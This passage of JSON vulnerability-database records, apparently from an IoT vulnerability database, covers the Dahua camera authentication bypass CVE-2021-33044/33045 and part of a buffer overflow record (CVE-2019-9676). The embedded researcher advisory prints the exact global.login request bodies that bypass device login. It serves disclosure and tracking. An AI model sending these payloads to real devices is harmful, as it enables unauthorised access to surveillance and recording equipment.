          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2021-33044",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "High",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "Complete",
                "baseScore": 7.6,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2024-000007",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2021-103421",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.6,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 4.9,
                "id": "CNVD-2021-70816",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-33044",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "IPA",
                "availabilityImpact": "High",
                "baseScore": 8.1,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2024-000007",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2021-33044",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2024-000007",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-103421",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-70816",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202109-1080",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n               \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n        \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"loginType\": \"Direct\",\n        \"clientType\": \"NetKeyboard\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"Not Used\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Default\",\n        \"password\": \"[REDACTED]\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n    \"method\": \"global.login\",\n    \"params\":\n    {\n        \"userName\": \"admin\",\n        \"ipAddr\": \"127.0.0.1\",\n        \"loginType\": \"Loopback\",\n        \"clientType\": \"Local\",\n        \"authorityType\": \"Default\",\n        \"passwordType\": \"Plain\",\n        \"password\": \"admin\"\n    },\n    \"id\": 1,\n    \"session\": 0\n}\n\n[ETX]\n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          }
        ],
        "trust": 3.51
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33044",
            "trust": 5.4
          },
          {
            "db": "PACKETSTORM",
            "id": "164423",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVN83655695",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33044",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33044"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "id": "VAR-202109-1875",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          }
        ],
        "trust": 2.2
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          }
        ]
      },
      "last_update_date": "2024-01-19T23:24:12.199000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Dahua\u00a0Technology : DHCC-SA-202106-001",
            "trust": 0.8,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
          },
          {
            "title": "DHCC-SA-202106-001",
            "trust": 0.8,
            "url": "https://www.dahuasecurity.com/aboutus/trustedcenter/details/582"
          },
          {
            "title": "Patch for Dahua IPC authentication bypass vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/311536"
          },
          {
            "title": "Patch for Identity authentication bypass vulnerabilities in some Dahua products",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/290751"
          },
          {
            "title": "Dahua  IPC Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164675"
          },
          {
            "title": "PoC",
            "trust": 0.1,
            "url": "https://github.com/mcw0/poc "
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33044"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.0
          },
          {
            "problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "Inappropriate authentication (CWE-287) [IPA evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "http://seclists.org/fulldisclosure/2021/oct/13"
          },
          {
            "trust": 2.3,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
          },
          {
            "trust": 2.2,
            "url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/jp/jvn83655695/index.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/mcw0/poc"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/mcw0/dahuaconsole"
          },
          {
            "trust": 0.1,
            "url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33044"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33044"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-12-30T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "date": "2021-09-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "date": "2022-08-31T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "date": "2024-01-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "date": "2021-10-06T15:11:51",
            "db": "PACKETSTORM",
            "id": "164423"
          },
          {
            "date": "2021-09-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          },
          {
            "date": "2021-09-15T22:15:10.497000",
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-01-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "date": "2021-09-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "date": "2022-08-31T04:47:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "date": "2024-01-18T03:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "date": "2021-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          },
          {
            "date": "2021-12-02T13:50:00.800000",
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202109-1080"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201906-0243

    Vulnerability from variot - Updated: 2023-12-18 14:05

    Buffer overflow vulnerability found in some Dahua IP Camera devices IPC-HFW1XXX,IPC-HDW1XXX,IPC-HFW2XXX Build before 2018/11. The vulnerability exits in the function of redirection display for serial port printing information, which can not be used by product basic functions. After an attacker logs in locally, this vulnerability can be exploited to cause device restart or arbitrary code execution. Dahua has identified the corresponding security problems in the static code auditing process, so it has gradually deleted this function, which is no longer available in the newer devices and softwares. Dahua has released versions of the affected products to fix the vulnerability. Dahua IPC-HFW1XXX , IPC-HDW1XXX , IPC-HFW2XXX The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaIPC-HFW1XXX and so on are all IP cameras from Dahua, China

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0243",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hfw2xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2018-11"
          },
          {
            "model": "ipc-hdw1xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2018-11"
          },
          {
            "model": "ipc-hfw1xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2018-11"
          },
          {
            "model": "ipc-hdw1xxx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2018/11"
          },
          {
            "model": "ipc-hfw1xxx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2018/11"
          },
          {
            "model": "ipc-hfw2xxx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2018/11"
          },
          {
            "model": "ipc-hdw1xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw1xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-17496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005507"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw1xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2018-11",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw1xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2018-11",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2018-11",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-9676"
          }
        ]
      },
      "cve": "CVE-2019-9676",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.2,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 3.9,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
